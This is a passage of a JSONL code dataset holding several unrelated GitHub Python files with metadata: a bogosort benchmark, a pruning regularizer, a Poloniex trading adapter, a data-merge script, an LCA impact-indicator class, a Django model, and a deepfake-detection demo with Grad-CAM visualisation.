"telebot.types.InlineKeyboardButton", "line_number": 14, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 14, "usage_type": "name"}, {"api_name": "db_ops.selectbigger", "line_number": 17, "usage_type": "call"}, {"api_name": "db_ops.update", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "20778919138", "text": "import timeit\r\nimport time\r\nimport random\r\nfrom prettytable import PrettyTable\r\n\r\ndef is_sorted(data) -> bool:\r\n return all(data[i] <= data[i + 1] for i in range(len(data) - 1))\r\n\r\ndef bogosort(data) -> list:\r\n while not is_sorted(data):\r\n random.shuffle(data)\r\n return data\r\n\r\nmult= [10, 100, 1000, 10000, 100000]\r\ntemps = []\r\nfor i in range(len(mult)):\r\n a = []\r\n for j in range(mult[i]):\r\n a.append(random.randint(-1000,1000))\r\n temps.append(timeit.timeit(\"bogosort(a)\",setup=\"from __main__ import bogosort, a\", number=1))\r\n \r\ntable= PrettyTable([\"Nombre d'éléments\", \"Temps de tri\"], padding_width=5)\r\ntable.title = \"Quantum Bogosort\"\r\nfor k in range(len(mult)):\r\n table.add_row([mult[k], temps[k]]) #notation scientifique a 3chiffres après la virgule\r\ntable.align[\"Nombre d'éléments\"] = \"l\"\r\ntable.align[\"Temps de tri\"] = \"r\"\r\n\r\nprint(table)\r\n", "repo_name": "BeowolfK/PEIP", "sub_path": "rapid_sort.py", "file_name": "rapid_sort.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "random.shuffle", "line_number": 11, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 19, "usage_type": "call"}, {"api_name": "timeit.timeit", "line_number": 20, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "21743900235", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom .regularizer import _Regularizer\n\n\nclass Conv2dWithMask(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1, bias=True):\n\n super(Conv2dWithMask, self).__init__(\n in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, groups=groups, bias=bias)\n\n self.test_mask = None\n self.p_mask = 1.0\n self.frequency = 16\n\n def forward(self, input):\n if self.training:\n self.frequency -= 1\n if self.frequency == 0:\n sample = np.random.binomial(n=1, p=self.p_mask, size=self.out_channels)\n param = self.weight\n l1norm = param.detach().view(param.size(0), -1).norm(p=1, dim=1)\n mask = torch.tensor(sample)\n mask = mask.expand(param.size(1) * param.size(2) * param.size(3), param.size(0)).t().contiguous()\n mask = mask.view(self.weight.shape).to(param.device)\n mask = mask.type(param.type())\n masked_weights = self.weight * mask\n masked_l1norm = masked_weights.detach().view(param.size(0), -1).norm(p=1, dim=1)\n pruning_factor = (masked_l1norm.sum() / l1norm.sum()).item()\n pruning_factor = max(0.2, pruning_factor)\n weight = masked_weights / pruning_factor\n self.frequency = 16\n else:\n weight = self.weight\n else:\n weight = self.weight\n return F.conv2d(input, weight, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n\n# replaces all conv2d layers in target`s model with 'Conv2dWithMask'\ndef replace_conv2d(container):\n for name, module in container.named_children():\n if (isinstance(module, nn.Conv2d)):\n print(\"replacing: \", name)\n new_module = Conv2dWithMask(in_channels=module.in_channels,\n out_channels=module.out_channels,\n kernel_size=module.kernel_size, padding=module.padding,\n stride=module.stride, bias=module.bias)\n setattr(container, name, new_module)\n replace_conv2d(module)\n\n\nclass DropFilterRegularizer(_Regularizer):\n def __init__(self, name, model, reg_regims, threshold_criteria=None):\n super().__init__(name, model, reg_regims, threshold_criteria)\n replace_conv2d(model)\n", "repo_name": "IntelLabs/distiller", "sub_path": "distiller/regularization/drop_filter.py", "file_name": "drop_filter.py", "file_ext": "py", "file_size_in_byte": 2674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4246, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.nn.Conv2d", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.random.binomial", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "regularizer._Regularizer", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "16950126377", "text": "# -*- coding: utf-8 -*-\nimport operator\nfrom functools import partial\nfrom logging import getLogger\nfrom typing import Callable\nfrom typing import Dict\nfrom moneybot.clients import Poloniex\nfrom moneybot.market.adapters import MarketAdapter\nfrom moneybot.market.history import MarketHistory\nfrom moneybot.market.state import MarketState\nfrom moneybot.strategy import ProposedTrade\n\n\nlogger = getLogger(__name__)\n\n\nclass LiveMarketAdapter(MarketAdapter):\n\n def __init__(\n self,\n market_history: MarketHistory,\n fiat: str,\n ) -> None:\n self.polo = Poloniex.get_client()\n self.market_history = market_history\n self.balances = self.get_balances()\n self.fiat = fiat\n\n def get_balances(self) -> Dict[str, float]:\n bals = self.polo.returnCompleteBalances()\n all_balances = {}\n for coin, bal, in bals.items():\n avail = float(bal['available'])\n if avail > 0:\n all_balances[coin] = avail\n return all_balances\n\n def execute(\n self,\n proposed_trade: ProposedTrade,\n ) -> Dict[str, float]:\n self._place_order(proposed_trade, self.market_state)\n return self.get_balances()\n\n '''\n Private methods\n '''\n\n def _adjust(\n self,\n val: float,\n operator: Callable,\n tweak: float = 0.001,\n ) -> float:\n '''\n Pass in `operator.__add__`\n or `operator.__sub__`\n to move `val` up or down by `tweak`.\n '''\n return operator(val, (val * tweak))\n\n def _adjust_up(self, val: float, **kwargs) -> float:\n return self._adjust(val, operator.__add__, **kwargs)\n\n def _adjust_down(self, val: float, **kwargs) -> float:\n return self._adjust(val, operator.__sub__, **kwargs)\n\n def _proposed_trade_measurement(\n self,\n direction: str,\n market: str,\n price: float,\n amount: float,\n order_status: str,\n ) -> Dict:\n return {\n 'measurement': 'proposedTrade',\n 'tags': {\n 'order_status': order_status,\n },\n 'fields': {\n 'direction': direction,\n 'market': market,\n 'price': price,\n 'amount': amount,\n }\n }\n\n def _purchase_helper(\n self,\n direction: str,\n market: str,\n price: float,\n amount: float,\n purchase_fn: Callable,\n adjust_fn: Callable,\n ) -> Dict:\n make_measurement = partial(self._proposed_trade_measurement,\n direction, market, price, amount)\n try:\n res = purchase_fn(\n market,\n price,\n amount,\n # Cancel order if not fulfilled in entirity at this price\n orderType='fillOrKill',\n )\n measurement = make_measurement('filled')\n logger.debug(str(measurement))\n # If we can't fill the order at this price,\n except:\n measurement = make_measurement('killed')\n logger.debug(str(measurement))\n # recursively again at a (higher / lower) price\n adjusted_price = adjust_fn(price)\n return self._purchase_helper(\n direction,\n market,\n adjusted_price,\n amount,\n purchase_fn,\n adjust_fn\n )\n return res\n\n def _place_order(\n self,\n proposed_trade: ProposedTrade,\n market_state: MarketState,\n ) -> Dict:\n\n # in the language of poloniex,\n # buying a market's quote currency is a \"buy\"\n if proposed_trade.buy_coin == proposed_trade.market_quote_currency:\n return self._purchase_helper(\n 'buy',\n proposed_trade.market_name,\n proposed_trade.market_price,\n proposed_trade.buy_amount,\n self.polo.buy,\n # We try to buy low,\n # But don't always get to,\n # so we adjust up if we must.\n self._adjust_up,\n )\n\n # in the language of poloniex,\n # buying a market's base currency is a \"sell\"\n elif proposed_trade.buy_coin == proposed_trade.market_base_currency:\n return self._purchase_helper(\n 'sell',\n proposed_trade.market_name,\n proposed_trade.market_price,\n proposed_trade.sell_amount,\n self.polo.sell,\n # We try to sell high,\n # But don't always get to,\n # so we adjust down if we must.\n self._adjust_down,\n )\n\n return {}\n", "repo_name": "JakeHartnell/moneybot", "sub_path": "moneybot/market/adapters/live.py", "file_name": "live.py", "file_ext": "py", "file_size_in_byte": 4800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "moneybot.market.adapters.MarketAdapter", "line_number": 17, "usage_type": "name"}, {"api_name": "moneybot.market.history.MarketHistory", "line_number": 21, "usage_type": "name"}, {"api_name": "moneybot.clients.Poloniex.get_client", "line_number": 24, "usage_type": "call"}, {"api_name": "moneybot.clients.Poloniex", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 29, "usage_type": "name"}, {"api_name": "moneybot.strategy.ProposedTrade", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 52, "usage_type": "name"}, {"api_name": "operator.__add__", "line_number": 63, "usage_type": "attribute"}, {"api_name": "operator.__sub__", "line_number": 66, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 96, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 98, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 97, "usage_type": "name"}, {"api_name": "moneybot.strategy.ProposedTrade", "line_number": 128, "usage_type": "name"}, {"api_name": "moneybot.market.state.MarketState", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 130, "usage_type": "name"}]}
+{"seq_id": "6215218856", "text": "import json, sys\nimport time\nfrom functools import reduce\n\n# data.py存储着从vtbs.moe获取的主播数据\nfrom data.data import DATA\n\n# 原始文件路径\nsrc_file_path = \"data/ori_data.json\"\n# 目标文件路径\ntgt_file_path = \"data/data.py\"\n\ndef delete_duplicate(data):\n func = lambda x, y: x + [y] if y not in x else x\n data = reduce(func, [[], ] + data)\n return data\n\n# 最新的vtb数据\nwith open(src_file_path, \"r\", encoding=\"utf8\") as f:\n ori_data = json.load(f)\n\nprint(\"len(ori_data)=\" + str(len(ori_data)))\nprint(\"len(DATA)=\" + str(len(DATA)))\n\n# 先合并 再去重\n# new_data = DATA + ori_data\n# print(\"len(new_data)=\" + str(len(new_data)))\n\n# DATA = delete_duplicate(new_data)\n# print(\"duplicate len(DATA)=\" + str(len(DATA)))\n\n# 遍历 判断是否存在 后 尾部插入\nnum = 0\nfor temp_json in ori_data:\n if temp_json in DATA:\n continue\n else:\n # 追加入json\n DATA.append(temp_json)\n num += 1\n # print(temp_json)\n\nprint(\"add total num=\" + str(num))\n\nprint(\"after len(DATA)=\" + str(len(DATA)))\n\n# 数据写入本地喵\nwith open(tgt_file_path, 'w', encoding=\"utf-8\") as file_object:\n file_object.write(\"DATA=\" + json.dumps(DATA, ensure_ascii=False))\nfile_object.close()\nprint(\"write \" + tgt_file_path + \" over\")\n", "repo_name": "Ikaros-521/get_bili_medal_list", "sub_path": "update_data.py", "file_name": "update_data.py", "file_ext": "py", "file_size_in_byte": 1290, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "data.data", "line_number": 15, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 15, "usage_type": "call"}, {"api_name": "data.data", "line_number": 16, "usage_type": "name"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "data.data.DATA", "line_number": 23, "usage_type": "argument"}, {"api_name": "data.data.DATA", "line_number": 35, "usage_type": "name"}, {"api_name": "data.data.DATA.append", "line_number": 39, "usage_type": "call"}, {"api_name": "data.data.DATA", "line_number": 39, "usage_type": "name"}, {"api_name": "data.data.DATA", "line_number": 45, "usage_type": "argument"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "data.data.DATA", "line_number": 49, "usage_type": "argument"}]}
+{"seq_id": "42489963026", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nQSDsan: Quantitative Sustainable Design for sanitation and resource recovery systems\n\nThis module is developed by:\n Yalin Li \n\nThis module is under the University of Illinois/NCSA Open Source License.\nPlease refer to https://github.com/QSD-Group/QSDsan/blob/master/LICENSE.txt\nfor license details.\n'''\n\n\n# %%\n\nfrom ._units_of_measure import parse_unit\nfrom .utils.loading import load_data, data_path\ndata_path += '_impact_indicator.tsv'\n\n__all__ = ('ImpactIndicator', )\n\n\nclass ImpactIndicator:\n '''\n To handle different impact indicators in life cycle assessment.\n \n Parameters\n ----------\n ID : str\n ID of the ImpactIndicator.\n synonym : str\n Alternative ID of the ImpactIndicator.\n method : str\n Impact assessment method, e.g., 'TRACI'.\n category : str\n Category of the ImpactIndicator, e.g., 'human healt'.\n unit : str\n Unit of the ImpactIndicator, e.g., 'kg CO2-eq'.\n description : str\n Supplementary explanation.\n \n '''\n \n _indicators = {}\n _default_data = None\n \n __slots__ = ('_ID', '_synonym', '_method', '_category', '_unit', '_ureg_unit',\n '_unit_remaining', '_description')\n\n def __init__(self, ID, synonym='', method='', category='', unit='', description=''):\n \n if ID in ImpactIndicator._indicators.keys():\n raise ValueError(f'The ID \"{ID}\" is currently in use.')\n self._ID = ID\n self._unit = str(unit)\n self._ureg_unit, self._unit_remaining = parse_unit(unit)\n self._method = method\n self._category = category\n self._description = description\n ImpactIndicator._indicators[ID] = self\n if synonym and str(synonym) != 'nan':\n self.set_synonym(synonym)\n\n def __repr__(self):\n return f''\n\n def show(self):\n '''Show basic information about this indicator.'''\n if self.unit:\n info = f'ImpactIndicator: {self.ID} as {self.unit}'\n else:\n info = f'ImpactIndicator: {self.ID}'\n line = '\\n Synonyms : '\n synonyms = self.get_synonym()\n if synonyms:\n for synonym in synonyms[:-1]:\n line += synonym + '; '\n line += synonyms[-1]\n if len(line) > 40: line = line[:40] + '...'\n info += line\n info += f'\\n Method : {self.method or None}'\n info += f'\\n Category : {self.category or None}'\n line = f'\\n Description: {self.description or None}'\n if len(line) > 40: line = line[:40] + '...'\n info += line\n print(info)\n \n _ipython_display_ = show\n \n def set_synonym(self, synonym):\n '''\n Give the indicator a synonym.\n\n Parameters\n ----------\n ID : str\n Original ID.\n synonym : str\n New synonym of the indicator.\n\n '''\n dct = ImpactIndicator._indicators\n if synonym in dct.keys() and dct[synonym] is not self:\n raise ValueError(f'The synonym \"{synonym}\" already in use.')\n else:\n dct[synonym] = self\n \n def get_synonym(self):\n '''Return all synonyms of the indicator as a list.'''\n return tuple(i for i, j in ImpactIndicator._indicators.items()\n if j==self and i != self.ID)\n\n\n @classmethod\n def load_default_indicators(cls):\n '''Load all default indicators as in /data/_impact_indicator.xlsx.'''\n if cls._default_data is not None:\n data = cls._default_data\n else: data = load_data(path=data_path)\n for indicator in data.index:\n if indicator in cls._indicators.keys():\n continue\n else:\n new = cls.__new__(cls)\n new.__init__(ID=indicator,\n synonym=data.loc[indicator]['synonym'],\n unit=data.loc[indicator]['unit'],\n method=data.loc[indicator]['method'],\n category=data.loc[indicator]['category'],\n description=data.loc[indicator]['description'])\n cls._indicators[indicator] = new\n cls._default_data = data\n\n\n @classmethod\n def get_indicator(cls, ID):\n '''Get an indicator by its ID.'''\n return cls._indicators[ID]\n\n @classmethod\n def get_all_indicators(cls):\n '''Get all defined indicators.'''\n return tuple(i for i in set([i for i in ImpactIndicator._indicators.values()]))\n\n @property\n def ID(self):\n '''ID of the impact indicator.''' \n return self._ID\n\n @property\n def unit(self):\n '''Unit of the impact indicator.''' \n return self._unit\n @unit.setter\n def unit(self, i):\n self._unit = str(i)\n self._ureg_unit, self._unit_remaining = parse_unit(i)\n\n @property\n def method(self):\n '''Impact assessment method of the indicator.''' \n return self._method\n @method.setter\n def method(self, i):\n self._method = i\n\n @property\n def category(self):\n '''Impact category of the indicator.''' \n return self._category\n @category.setter\n def category(self, i):\n self._category = i\n\n @property\n def description(self):\n '''Description of the impact indicator.''' \n return self._description\n @description.setter\n def description(self, i):\n self._description = i\n\n\n\n\n# ImpactIndicator.load_default_indicators()\n\n\n\n", "repo_name": "stetsonrowles/QSDsan", "sub_path": "qsdsan/_impact_indicator.py", "file_name": "_impact_indicator.py", "file_ext": "py", "file_size_in_byte": 5646, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "32", "api": [{"api_name": "utils.loading.data_path", "line_number": 20, "usage_type": "name"}, {"api_name": "_units_of_measure.parse_unit", "line_number": 58, "usage_type": "call"}, {"api_name": "utils.loading.load_data", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.loading.data_path", "line_number": 121, "usage_type": "name"}, {"api_name": "_units_of_measure.parse_unit", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "2001844974", "text": "\"\"\"Menu options models.\"\"\"\n\n# Django\nfrom django.db import models\nfrom django.db.backends.base.operations import BaseDatabaseOperations\nfrom django.utils.translation import gettext_lazy as _\n\n# Backend test\nfrom backend_test.menus.models.meals import Meal\nfrom backend_test.menus.models.menus import Menu\nfrom backend_test.utils.models import TimeStampedModel\n\n\nclass MenuOption(TimeStampedModel):\n \"\"\"\n Menu option model class.\n\n Extend from TimeStampedModel for default timestamp fields. Additionally\n add some extra fields.\n \"\"\"\n\n menu = models.ForeignKey(\n Menu,\n verbose_name=_(\"menu\"),\n on_delete=models.PROTECT,\n related_name=\"menu_options\",\n related_query_name=\"menu_option\",\n )\n meal = models.ForeignKey(\n Meal,\n verbose_name=_(\"meal\"),\n on_delete=models.PROTECT,\n related_name=\"menu_options\",\n related_query_name=\"menu_option\",\n )\n option = models.PositiveSmallIntegerField(\n _(\"option\"),\n default=BaseDatabaseOperations.integer_field_ranges[\n models.PositiveSmallIntegerField.__name__\n ][1],\n help_text=_(\"Option number in menu (useful for ordering).\"),\n )\n\n class Meta(TimeStampedModel.Meta):\n \"\"\"Meta options.\"\"\"\n\n verbose_name = _(\"menu option\")\n verbose_name_plural = _(\"menu options\")\n constraints = [\n models.UniqueConstraint(\n fields=[\"menu\", \"meal\"],\n name=\"menu_option_menu_meal_unique\",\n )\n ]\n ordering = [\"option\", \"-created\"]\n db_table = \"menus_menu_option\"\n\n def __str__(self) -> str:\n \"\"\"Return instance string representation\"\"\"\n return f\"{self.option}\"\n", "repo_name": "atahualpasf/backend-test-silva", "sub_path": "cornershop-backend-test/backend_test/menus/models/menu_options.py", "file_name": "menu_options.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "backend_test.utils.models.TimeStampedModel", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 22, "usage_type": "call"}, {"api_name": "backend_test.menus.models.menus.Menu", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.PROTECT", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 29, "usage_type": "call"}, {"api_name": "backend_test.menus.models.meals.Meal", "line_number": 30, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models.PROTECT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.PositiveSmallIntegerField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.backends.base.operations.BaseDatabaseOperations.integer_field_ranges", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.db.backends.base.operations.BaseDatabaseOperations", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.PositiveSmallIntegerField", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 41, "usage_type": "call"}, {"api_name": "backend_test.utils.models.TimeStampedModel.Meta", "line_number": 44, "usage_type": "attribute"}, {"api_name": "backend_test.utils.models.TimeStampedModel", "line_number": 44, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 47, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models.UniqueConstraint", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "24813916432", "text": "import argparse\nfrom glob import glob\nimport math\nimport os\nimport subprocess\n\nimport cv2\nfrom matplotlib import pyplot as plt\nimport torch\nimport numpy as np\nfrom decord import VideoReader\nfrom omegaconf import OmegaConf\n\nfrom pytorch_grad_cam import ActivationsAndGradients\n\nimport models\n\ndef load_model(url, map_location='cpu'):\n if url.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n url, map_location=map_location)\n else:\n checkpoint = torch.load(url, map_location=map_location)\n return checkpoint\n\n\ndef make_divisible(x, divisor=32):\n # Returns x evenly divisible by divisor\n return math.ceil(x / divisor) * divisor\n\n\nclass Detector:\n\n def __init__(self, weights, device='cpu', img_size=640) -> None:\n self.device = device\n self.img_size = img_size\n self.model = load_model(weights, device)['model'].float().fuse().eval()\n\n def __call__(self, imgs):\n h0, w0 = imgs[0].shape[:2]\n r = self.img_size / max(h0, w0) # resize image to img_size\n w, h = make_divisible(w0 * r), make_divisible(h0 * r)\n if r != 1:\n interp = cv2.INTER_AREA if r < 1 else cv2.INTER_LINEAR\n imgs = [cv2.resize(img, (w, h), interpolation=interp) for img in imgs]\n scale = torch.tensor([w0 / w, h0 / h] * 2)\n img = np.stack(imgs).transpose(0, 3, 1, 2)\n img = np.ascontiguousarray(img)\n img = torch.from_numpy(img).to(self.device, non_blocking=True)\n img = img.float() / 255.\n\n # Inference\n pred = self.model(img)[0]\n\n # Process detections\n index = pred[..., 4].max(1).indices\n return pred[range(index.size(0)), index, :4].cpu().mul(scale).numpy()\n\n\nclass FaceVideo:\n\n def __init__(self, src, detector, n_frames=16, img_size=224) -> None:\n self.src = src\n self.n_frames = n_frames\n if isinstance(img_size, int):\n img_size = (img_size, img_size)\n self.img_size = img_size\n self.detector = detector\n self.mean = np.float32([0.485, 0.456, 0.406]) * 255\n self.std = np.float32([0.229, 0.224, 0.225]) * 255\n self._frames = None\n self._boxes = None\n\n @property\n def frames(self):\n if self._frames is None:\n vr = VideoReader(self.src)\n sampled_idxs = np.linspace(0, len(vr) - 1, self.n_frames, dtype=int).tolist()\n self._frames = list(vr.get_batch(sampled_idxs).asnumpy())\n return self._frames\n \n @property\n def boxes(self):\n if self._boxes is None:\n self._boxes = self.detector(self.frames)\n return self._boxes\n\n def crop(self, margin=1.3):\n cx, cy = self.boxes[:, 0], self.boxes[:, 1]\n hw = self.boxes[:, 2:].max(-1) * margin\n rois = np.stack([cx - hw / 2, cy - hw /2, cx + hw / 2, cy + hw / 2], 1).clip(0)\n clip = []\n for frame, roi in zip(self.frames, rois.tolist()):\n x0, y0, x1, y1 = map(int, roi)\n clip.append(cv2.resize(frame[y0:y1, x0:x1], self.img_size, interpolation=cv2.INTER_LINEAR))\n return clip\n\n def load_cropped_frames(self, margin=1.3):\n cx, cy = self.boxes[:, 0], self.boxes[:, 1]\n hw = self.boxes[:, 2:].max(-1) * margin\n rois = np.stack([cx - hw / 2, cy - hw /2, cx + hw / 2, cy + hw / 2], 1).clip(0)\n clip = []\n for frame, roi in zip(self.frames, rois.tolist()):\n x0, y0, x1, y1 = map(int, roi)\n clip.append(cv2.resize(frame[y0:y1, x0:x1], self.img_size, interpolation=cv2.INTER_LINEAR))\n clip = (np.float32(clip) - self.mean) / self.std\n clip = np.ascontiguousarray(clip.transpose(0, 3, 1, 2))\n return torch.from_numpy(clip)\n\n\nclass VideoWriter:\n def __init__(self, filename, fps=24) -> None:\n self.filename = filename\n if self.filename:\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n self.fps = fps\n self.p = None\n \n def write(self, frame):\n if not self.filename:\n return\n if self.p is None:\n h, w, _ = frame.shape\n self.p = subprocess.Popen([\n \"ffmpeg\",\n '-y', # overwrite output file if it exists\n '-f', 'rawvideo',\n '-vcodec','rawvideo',\n '-s', f'{w}x{h}', # size of one frame\n '-pix_fmt', 'bgr24',\n '-r', f'{self.fps}', # frames per second\n '-i', '-', # The imput comes from a pipe\n '-s', f'{w}x{h}',\n '-an', # Tells FFMPEG not to expect any audio\n '-loglevel', 'error',\n '-b:v', '800k',\n '-pix_fmt', 'yuv420p',\n self.filename\n ], stdin=subprocess.PIPE)\n self.p.stdin.write(frame.tobytes())\n\n def close(self):\n if self.p:\n self.p.stdin.flush()\n self.p.stdin.close()\n self.p.wait()\n\n\n@torch.no_grad()\ndef main():\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument('-i', '--input', type=str,\n default='data/ffpp_videos/manipulated_sequences/Deepfakes/c40/videos/000_003.mp4')\n parser.add_argument('-c', '--config', type=str, default='configs/ffpp_x3d_inference.yaml')\n parser.add_argument('-d', '--device', type=str,\n default='cuda' if torch.cuda.is_available() else 'cpu')\n parser.add_argument('--n_frames', type=int, default=16)\n parser.add_argument('--detector', type=str,\n default='https://github.com/zyayoung/oss/releases/download/rdd/yolov5s-face.pt')\n parser.add_argument('--resume', type=str,\n default='https://github.com/zyayoung/oss/releases/download/rdd/ffpp_x3d.pth')\n args = parser.parse_args()\n\n oc_cfg = OmegaConf.load(args.config)\n oc_cfg.merge_with(vars(args))\n args = oc_cfg\n\n device = torch.device(args.device)\n print(\"Loading face detection model...\", end=' ', flush=True)\n detector = Detector(args.detector, device)\n print(\"Done\")\n\n print(\"Loading fogery detection model...\", end=' ', flush=True)\n model = models.__dict__[args.model.name](**args.model.params)\n state_dict = load_model(args.resume, map_location='cpu')\n if isinstance(state_dict, dict) and 'state_dict' in state_dict:\n state_dict = state_dict['state_dict']\n model.load_state_dict({\n k.replace('module.', ''): v for k, v in state_dict.items()})\n model.set_segment(args.n_frames)\n model.to(device).eval()\n print(\"Done\")\n target_layers = [model.rgb_blocks[-2], model.blocks[-2]]\n\n os.makedirs('figs/df_det', exist_ok=True)\n os.makedirs('figs/face_det', exist_ok=True)\n os.makedirs('figs/cropped', exist_ok=True)\n os.makedirs('figs/cam', exist_ok=True)\n for src in glob(\"data/ffpp_videos/*/*/c40/videos/00*.mp4\"):\n print(\"Detecting...\", end=' ', flush=True)\n video = FaceVideo(src, detector, n_frames=args.n_frames)\n frames = video.load_cropped_frames()\n frames = frames.flatten(0, 1).to(device, non_blocking=True)\n\n cam_model = ActivationsAndGradients(model, target_layers, None)\n pred = model(frames[None])[0]\n real_prob = pred.softmax(-1)[0].item()\n print(\"Done\")\n\n label = 'Fake' if real_prob < 0.5 else 'Real'\n confidence = 1 - real_prob if real_prob < 0.5 else real_prob\n print(f'Result: {label}; Confidence: {confidence:.2f}')\n _, _, _, method, _, _, name = src.split('/')\n\n vw_cam = VideoWriter(os.path.join('figs/cam', f'{method}_{name}'), 2)\n with torch.enable_grad():\n cam_model(frames[None])[0, 1 if real_prob < 0.5 else 0].backward(retain_graph=True)\n\n # pull the gradients out of the cam_model\n heat_map_sum = 0\n for gradient, activation in zip(cam_model.gradients, cam_model.activations):\n activation *= gradient.mean((2, 3, 4), True)\n heat_map = activation[0].mean(0).relu()\n heat_map_sum = heat_map_sum + heat_map\n heat_map_sum.div_(heat_map_sum.max())\n for heat_map, frame in zip(heat_map_sum.cpu().numpy(), video.crop()):\n img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n heatmap1 = cv2.resize(heat_map, (frame.shape[1], frame.shape[0]))\n heatmap1 = np.uint8(255 * (heatmap1))\n heatmap1 = cv2.applyColorMap(heatmap1, cv2.COLORMAP_JET)\n vw_cam.write(heatmap1 // 2 + img // 2)\n vw_cam.close()\n cam_model.release()\n\n h, w = video.frames[0].shape[:2]\n tl = max(1, round(0.002 * (h + w)) ) # line/font thickness\n video = FaceVideo(src, detector, n_frames=128)\n vw_df = VideoWriter(os.path.join('figs/df_det', f'{method}_{name}'), 16)\n vw_face = VideoWriter(os.path.join('figs/face_det', f'{method}_{name}'), 16)\n vw_crop = VideoWriter(os.path.join('figs/cropped', f'{method}_{name}'), 16)\n for i, (frame, cropped, box) in enumerate(zip(video.frames, video.crop(), video.boxes)):\n x, y, w, h = box\n x1, y1, x2, y2 = map(int, (x-w/2, y-h/2, x+w/2, y+h/2))\n color = (0, 0, 255) if real_prob < 0.5 else (0, 255, 0)\n img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n img_df = cv2.rectangle(img.copy(), (x1, y1), (x2, y2), color, tl)\n img_df = cv2.putText(img_df, label, (x1, y1 - tl * 2), 0, tl, color, tl, cv2.LINE_AA)\n vw_df.write(img_df)\n cropped = cv2.cvtColor(cropped, cv2.COLOR_RGB2BGR)\n vw_crop.write(cropped)\n img_face = cv2.rectangle(img.copy(), (x1, y1), (x2, y2), (255, 255, 255), tl)\n vw_face.write(img_face)\n vw_df.close()\n vw_face.close()\n vw_crop.close()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ThreeCatsLoveFish/RDD", "sub_path": "model/demo.py", "file_name": "demo.py", 